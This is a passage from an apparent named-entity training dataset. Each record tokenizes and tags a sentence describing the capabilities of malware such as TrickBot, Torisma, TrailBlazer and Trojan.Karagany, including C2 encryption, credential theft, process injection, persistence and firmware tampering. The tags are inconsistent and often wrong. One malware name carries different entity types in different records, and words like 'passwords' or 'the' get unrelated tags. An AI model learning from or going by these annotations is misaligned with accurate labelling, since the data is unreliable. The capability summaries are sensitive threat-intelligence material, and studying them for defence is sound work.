[ - "Torisma", - "is", - "only", - "delivered", - "to", - "a", - "compromised", - "host", - "if", - "the", - "victim's", - "IP", - "address", - "is", - "on", - "an", - "allow-list." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Torisma", - "can", - "send", - "victim", - "data", - "to", - "an", - "actor-controlled", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Torisma", - "has", - "used", - "various", - "Windows", - "API", - "calls." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Torisma", - "has", - "been", - "packed", - "with", - "Iz4", - "compression." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Torisma", - "has", - "encoded", - "C2", - "communications", - "with", - "Base64." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Torisma", - "has", - "encrypted", - "its", - "C2", - "communications", - "using", - "XOR", - "and", - "VEST-32." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Torisma", - "can", - "use", - "`GetlogicalDrives`", - "to", - "get", - "a", - "bitmask", - "of", - "all", - "drives", - "available", - "on", - "a", - "compromised", - "system.", - "It", - "can", - "also", - "use", - "`GetDriveType`", - "to", - "determine", - "if", - "a", - "new", - "drive", - "is", - "a", - "CD-ROM", - "drive." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Torisma", - "can", - "collect", - "the", - "local", - "MAC", - "address", - "using", - "`GetAdaptersInfo`", - "as", - "well", - "as", - "the", - "system's", - "IP", - "address." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Torisma", - "can", - "use", - "`WTSEnumerateSessionsW`", - "to", - "monitor", - "remote", - "desktop", - "connections." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Torisma", - "can", - "collect", - "the", - "current", - "time", - "on", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Torisma", - "can", - "use", - "HTTP", - "and", - "HTTPS", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrailBlazer", - "can", - "masquerade", - "its", - "C2", - "traffic", - "as", - "legitimate", - "Google", - "Notifications", - "HTTP", - "requests." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrailBlazer", - "has", - "used", - "random", - "identifier", - "strings", - "to", - "obscure", - "its", - "C2", - "operations", - "and", - "result", - "codes." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrailBlazer", - "has", - "used", - "filenames", - "that", - "match", - "the", - "name", - "of", - "the", - "compromised", - "system", - "in", - "attempt", - "to", - "avoid", - "detection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrailBlazer", - "has", - "used", - "HTTP", - "requests", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrailBlazer", - "has", - "the", - "ability", - "to", - "use", - "WMI", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "implant", - "malicious", - "code", - "into", - "a", - "compromised", - "device's", - "firmware." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "uses", - "web", - "injects", - "and", - "browser", - "redirection", - "to", - "trick", - "the", - "user", - "into", - "providing", - "their", - "login", - "credentials", - "on", - "a", - "fake", - "or", - "modified", - "web", - "page." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "come", - "with", - "a", - "signed", - "downloader", - "component." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "used", - "COM", - "to", - "setup", - "scheduled", - "task", - "for", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "the", - "ability", - "to", - "capture", - "RDP", - "credentials", - "by", - "capturing", - "the", - "<code>CredEnumerateA</code>", - "API" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "uses", - "brute-force", - "attack", - "against", - "RDP", - "with", - "rdpscanDll", - "module." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Org", - "B-OffAct", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "obtain", - "passwords", - "stored", - "in", - "files", - "from", - "several", - "applications", - "such", - "as", - "Outlook,", - "Filezilla,", - "OpenSSH,", - "OpenVPN", - "and", - "WinSCP.", - "Additionally,", - "it", - "searches", - "for", - "the", - "\".vnc.lnk\"", - "affix", - "to", - "steal", - "VNC", - "credentials." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-Purp", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "obtain", - "passwords", - "stored", - "in", - "files", - "from", - "web", - "browsers", - "such", - "as", - "Chrome,", - "Firefox,", - "Internet", - "Explorer,", - "and", - "Microsoft", - "Edge,", - "sometimes", - "using", - "esentutl." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "I-Tool", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "retrieved", - "PuTTY", - "credentials", - "by", - "querying", - "the", - "<code>Software\\SimonTatham\\Putty\\Sessions</code>", - "registry", - "key" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "collects", - "local", - "files", - "and", - "information", - "from", - "the", - "victim’s", - "local", - "machine." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "decodes", - "the", - "configuration", - "data", - "and", - "modules." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "disable", - "Windows", - "Defender." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "gather", - "information", - "about", - "domain", - "trusts", - "by", - "utilizing", - "Nltest." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "TrickBot", - "collects", - "email", - "addresses", - "from", - "Outlook." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "uses", - "an", - "AES", - "CBC", - "(256", - "bits)", - "encryption", - "algorithm", - "for", - "its", - "loader", - "and", - "configuration", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "send", - "information", - "about", - "the", - "compromised", - "host", - "and", - "upload", - "data", - "to", - "a", - "hardcoded", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "utilizes", - "EternalBlue", - "and", - "EternalRomance", - "exploits", - "for", - "lateral", - "movement", - "in", - "the", - "modules", - "wormwinDll,", - "wormDll,", - "mwormDll,", - "nwormDll,", - "tabDll." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "B-Features", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "B-Way" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "been", - "known", - "to", - "reach", - "a", - "command", - "and", - "control", - "server", - "via", - "one", - "of", - "nine", - "proxy", - "IP", - "addresses." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "use", - "secondary", - "C2", - "servers", - "for", - "communication", - "after", - "establishing", - "connectivity", - "and", - "relaying", - "victim", - "information", - "to", - "primary", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "searches", - "the", - "system", - "for", - "all", - "of", - "the", - "following", - "file", - "extensions:", - ".avi,", - ".mov,", - ".mkv,", - ".mpeg,", - ".mpeg4,", - ".mp4,", - ".mp3,", - ".wav,", - ".ogg,", - ".jpeg,", - ".jpg,", - ".png,", - ".bmp,", - ".gif,", - ".tiff,", - ".ico,", - ".xlsx,", - "and", - ".zip.", - "It", - "can", - "also", - "obtain", - "browsing", - "history,", - "cookies,", - "and", - "plug-in", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "B-Features", - "O", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "TrickBot", - "module", - "\"Trickboot\"", - "can", - "write", - "or", - "erase", - "the", - "UEFI/BIOS", - "firmware", - "of", - "a", - "compromised", - "device." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "B-Way", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "used", - "a", - "hidden", - "VNC", - "(hVNC)", - "window", - "to", - "monitor", - "the", - "victim", - "and", - "collect", - "information", - "stealthily." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "downloads", - "several", - "additional", - "files", - "and", - "saves", - "them", - "to", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "collects", - "the", - "users", - "of", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "attempted", - "to", - "get", - "users", - "to", - "launch", - "malicious", - "documents", - "to", - "deliver", - "its", - "payload." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "TrickBot", - "downloader", - "has", - "used", - "an", - "icon", - "to", - "appear", - "as", - "a", - "Microsoft", - "Word", - "document." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "modify", - "registry", - "entries." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "uses", - "the", - "Windows", - "API", - "call,", - "CreateProcessW(),", - "to", - "manage", - "execution", - "flow.", - "TrickBot", - "has", - "also", - "used", - "<code>Nt*</code>", - "API", - "functions", - "to", - "perform", - "Process", - "Injection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "module", - "shareDll/mshareDll", - "discovers", - "network", - "shares", - "via", - "the", - "WNetOpenEnumA", - "API." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Some", - "TrickBot", - "samples", - "have", - "used", - "HTTP", - "over", - "ports", - "447", - "and", - "8082", - "for", - "C2.", - "Newer", - "versions", - "of", - "TrickBot", - "have", - "been", - "known", - "to", - "use", - "a", - "custom", - "communication", - "protocol", - "which", - "sends", - "the", - "data", - "unencrypted", - "over", - "port", - "443." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "uses", - "non-descriptive", - "names", - "to", - "hide", - "functionality." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "steal", - "passwords", - "from", - "the", - "KeePass", - "open", - "source", - "password", - "manager." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "identify", - "the", - "groups", - "the", - "user", - "on", - "a", - "compromised", - "host", - "belongs", - "to." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "been", - "known", - "to", - "use", - "PowerShell", - "to", - "download", - "new", - "payloads,", - "open", - "documents,", - "and", - "upload", - "data", - "to", - "command", - "and", - "control", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "I-Features", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "uses", - "module", - "networkDll", - "for", - "process", - "list", - "discovery." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Tool", - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "injects", - "into", - "the", - "svchost.exe", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "used", - "<code>Nt*</code>", - "Native", - "API", - "functions", - "to", - "inject", - "code", - "into", - "legitimate", - "processes", - "such", - "as", - "<code>wermgr.exe</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "TrickBot", - "establishes", - "persistence", - "in", - "the", - "Startup", - "folder." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "uses", - "vncDll", - "module", - "to", - "remote", - "control", - "the", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "enumerate", - "computers", - "and", - "network", - "devices." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "creates", - "a", - "scheduled", - "task", - "on", - "the", - "system", - "that", - "provides", - "persistence." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "leverages", - "a", - "custom", - "packer", - "to", - "obfuscate", - "its", - "functionality." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "used", - "an", - "email", - "with", - "an", - "Excel", - "sheet", - "containing", - "a", - "malicious", - "macro", - "to", - "deploy", - "the", - "malware" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "been", - "delivered", - "via", - "malicious", - "links", - "in", - "phishing", - "e-mails." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "Base64-encode", - "C2", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "B-SamFile", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "uses", - "a", - "custom", - "crypter", - "leveraging", - "Microsoft’s", - "CryptoAPI", - "to", - "encrypt", - "C2", - "traffic.Newer", - "versions", - "of", - "TrickBot", - "have", - "been", - "known", - "to", - "use", - "`bcrypt`", - "to", - "encrypt", - "and", - "digitally", - "sign", - "responses", - "to", - "their", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "gathers", - "the", - "OS", - "version,", - "machine", - "name,", - "CPU", - "type,", - "amount", - "of", - "RAM", - "available,", - "and", - "UEFI/BIOS", - "firmware", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "obtains", - "the", - "IP", - "address,", - "location,", - "and", - "other", - "relevant", - "network", - "information", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Way", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "can", - "identify", - "the", - "user", - "and", - "groups", - "the", - "user", - "belongs", - "to", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "collects", - "a", - "list", - "of", - "install", - "programs", - "and", - "services", - "on", - "the", - "system’s", - "machine." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "used", - "<code>printf</code>", - "and", - "file", - "I/O", - "loops", - "to", - "delay", - "process", - "execution", - "as", - "part", - "of", - "API", - "hammering." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "used", - "a", - "VNC", - "module", - "to", - "monitor", - "the", - "victim", - "and", - "collect", - "information", - "to", - "pivot", - "to", - "valuable", - "systems", - "on", - "the", - "network" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "uses", - "HTTPS", - "to", - "communicate", - "with", - "its", - "C2", - "servers,", - "to", - "get", - "malware", - "updates,", - "modules", - "that", - "perform", - "most", - "of", - "the", - "malware", - "logic", - "and", - "various", - "configuration", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "has", - "used", - "macros", - "in", - "Excel", - "documents", - "to", - "download", - "and", - "deploy", - "the", - "malware", - "on", - "the", - "user’s", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TrickBot", - "establishes", - "persistence", - "by", - "creating", - "an", - "autostart", - "service", - "that", - "allows", - "it", - "to", - "run", - "whenever", - "the", - "machine", - "boots." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "monitor", - "the", - "titles", - "of", - "open", - "windows", - "to", - "identify", - "specific", - "keywords." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "secure", - "C2", - "communications", - "with", - "SSL", - "and", - "TLS." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "steal", - "data", - "and", - "credentials", - "from", - "browsers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "has", - "used", - "plugins", - "with", - "a", - "self-delete", - "capability." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "enumerate", - "files", - "and", - "directories", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "upload,", - "download,", - "and", - "execute", - "files", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "capture", - "keystrokes", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "create", - "directories", - "to", - "store", - "plugin", - "output", - "and", - "stage", - "data", - "for", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "dump", - "passwords", - "and", - "save", - "them", - "into", - "<code>\\ProgramData\\Mail\\MailAg\\pwds.txt</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "base64", - "encode", - "and", - "AES-128-CBC", - "encrypt", - "data", - "prior", - "to", - "transmission." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "use", - "Tasklist", - "to", - "collect", - "a", - "list", - "of", - "running", - "tasks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "create", - "a", - "link", - "to", - "itself", - "in", - "the", - "Startup", - "folder", - "to", - "automatically", - "start", - "itself", - "upon", - "system", - "restart." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "take", - "a", - "desktop", - "screenshot", - "and", - "save", - "the", - "file", - "into", - "<code>\\ProgramData\\Mail\\MailAg\\shot.png</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "samples", - "sometimes", - "use", - "common", - "binary", - "packers", - "such", - "as", - "UPX", - "and", - "Aspack", - "on", - "top", - "of", - "a", - "custom", - "Delphi", - "binary", - "packer." - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "detect", - "commonly", - "used", - "and", - "generic", - "virtualization", - "platforms", - "based", - "primarily", - "on", - "drivers", - "and", - "file", - "paths." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "capture", - "information", - "regarding", - "the", - "victim's", - "OS,", - "security,", - "and", - "hardware", - "configuration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "gather", - "information", - "on", - "the", - "network", - "configuration", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "use", - "netstat", - "to", - "collect", - "a", - "list", - "of", - "network", - "connections." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Trojan.Karagany", - "can", - "gather", - "information", - "about", - "the", - "user", - "on", - "a", - "compromised", - "host." - 